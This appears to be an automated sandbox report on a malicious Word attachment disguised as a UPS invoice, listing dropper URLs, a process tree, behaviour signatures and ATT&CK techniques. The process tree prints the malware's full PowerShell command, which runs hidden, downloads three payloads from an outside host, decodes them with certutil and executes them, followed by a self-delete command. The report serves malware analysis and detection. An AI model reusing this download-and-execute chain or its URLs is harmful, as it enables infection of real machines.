Analysis

  • max time kernel
    143s
  • resource
    win10v191014
  • submitted
    11-12-2019 20:15

General

  • Target

    ups_invoice3105183.doc

  • Sample

    191211-xasqnnchds

  • SHA256

    0346971c0cf96bb3b143aea0e307f2d94af8a18474cc8e50dab4bcad965d2aa6

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://corp4.site/cVIka.dat

exe.dropper

http://corp4.site/vben.dat

exe.dropper

http://corp4.site/LugVP.dat

Signatures

  • Drops file in Windows directory 1 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Program crash 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Executes dropped EXE 2 IoCs
  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Windows security modification 2 TTPs 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks for installed software on the system 1 TTPs 65 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Checks system information in the registry 2 TTPs 2 IoCs

    System information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ups_invoice3105183.doc" /o ""
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:5028
  • C:\Windows\system32\SppExtComObj.exe
    C:\Windows\system32\SppExtComObj.exe -Embedding
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4036
    • C:\Windows\System32\SLUI.exe
      "C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent
      2⤵
        PID:4008
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -windowstyle hidden -command Import-Module BitsTransfer; Start-BitsTransfer -Source http://corp4.site/cVIka.dat,http://corp4.site/vben.dat,http://corp4.site/LugVP.dat -Destination \"$env:TEMP\vido.com\",\"$env:TEMP\sfera\",\"$env:TEMP\LugVP.exe\"; Set-Location -Path \"$env:TEMP\"; certutil -decode sfera comport; Start-Process vido.com -ArgumentList comport
      1⤵
      • Suspicious use of WriteProcessMemory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4800
      • C:\Windows\system32\certutil.exe
        "C:\Windows\system32\certutil.exe" -decode sfera comport
        2⤵
          PID:4208
        • C:\Users\Admin\AppData\Local\Temp\vido.com
          "C:\Users\Admin\AppData\Local\Temp\vido.com" comport
          2⤵
          • Suspicious use of WriteProcessMemory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of SetThreadContext
          • Executes dropped EXE
          PID:4272
          • C:\Users\Admin\AppData\Local\Temp\vido.com
            "C:\Users\Admin\AppData\Local\Temp\vido.com"
            3⤵
            • Suspicious use of WriteProcessMemory
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Executes dropped EXE
            PID:4220
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\vido.com"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:580
              • C:\Windows\SysWOW64\PING.EXE
                ping 127.0.0.1
                5⤵
                • Runs ping.exe
                PID:432
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 4220 -s 1372
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Program crash
              • Suspicious use of AdjustPrivilegeToken
              PID:1160
      • \??\c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s BITS
        1⤵
        • Drops file in Windows directory
        PID:4840
      • \??\c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
        1⤵
          PID:4360
        • \??\c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s DoSvc
          1⤵
            PID:4928
          • \??\c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k unistacksvcgroup
            1⤵
              PID:4644
            • \??\c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s wscsvc
              1⤵
                PID:3412
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k WerSvcGroup
                1⤵
                • Suspicious use of WriteProcessMemory
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of NtCreateUserProcessOtherParentProcess
                PID:920
              • \??\c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s WdiSystemHost
                1⤵
                  PID:1328
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s PcaSvc
                  1⤵
                    PID:1544
                  • \??\c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
                    1⤵
                      PID:2684
                    • C:\Windows\System32\svchost.exe
                      C:\Windows\System32\svchost.exe -k wsappx -s ClipSVC
                      1⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3224
                    • \??\c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s wisvc
                      1⤵
                        PID:4008

                      Network

                      MITRE ATT&CK Matrix ATT&CK v6

                      Defense Evasion

                      Install Root Certificate

                      1
                      T1130

                      Modify Registry

                      2
                      T1112

                      Disabling Security Tools

                      1
                      T1089

                      Discovery

                      Query Registry

                      5
                      T1012

                      System Information Discovery

                      4
                      T1082

                      Peripheral Device Discovery

                      1
                      T1120

                      Remote System Discovery

                      1
                      T1018

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\ProgramData\Microsoft\Windows\WER\Temp\WER38AA.tmp.csv
                      • C:\ProgramData\Microsoft\Windows\WER\Temp\WER38DA.tmp.txt
                      • C:\Users\Admin\AppData\Local\Temp\LugVP.exe
                      • C:\Users\Admin\AppData\Local\Temp\comport
                      • C:\Users\Admin\AppData\Local\Temp\sfera
                      • C:\Users\Admin\AppData\Local\Temp\vido.com
                      • C:\Users\Admin\AppData\Local\Temp\vido.com
                      • C:\Users\Admin\AppData\Local\Temp\vido.com
                      • memory/1160-19-0x0000000004AF0000-0x0000000004AF1000-memory.dmp
                        Filesize

                        4KB

                      • memory/1160-20-0x00000000054B0000-0x00000000054B1000-memory.dmp
                        Filesize

                        4KB

                      • memory/1160-21-0x00000000054B0000-0x00000000054B1000-memory.dmp
                        Filesize

                        4KB

                      • memory/1160-45-0x00000000055A0000-0x00000000055A1000-memory.dmp
                        Filesize

                        4KB

                      • memory/4220-11-0x0000000000EA0000-0x0000000000EFD000-memory.dmp
                        Filesize

                        372KB

                      • memory/4220-13-0x0000000000EA0000-0x0000000000EFD000-memory.dmp
                        Filesize

                        372KB

                      • memory/4840-14-0x0000021D16A30000-0x0000021D16A34000-memory.dmp
                        Filesize

                        16KB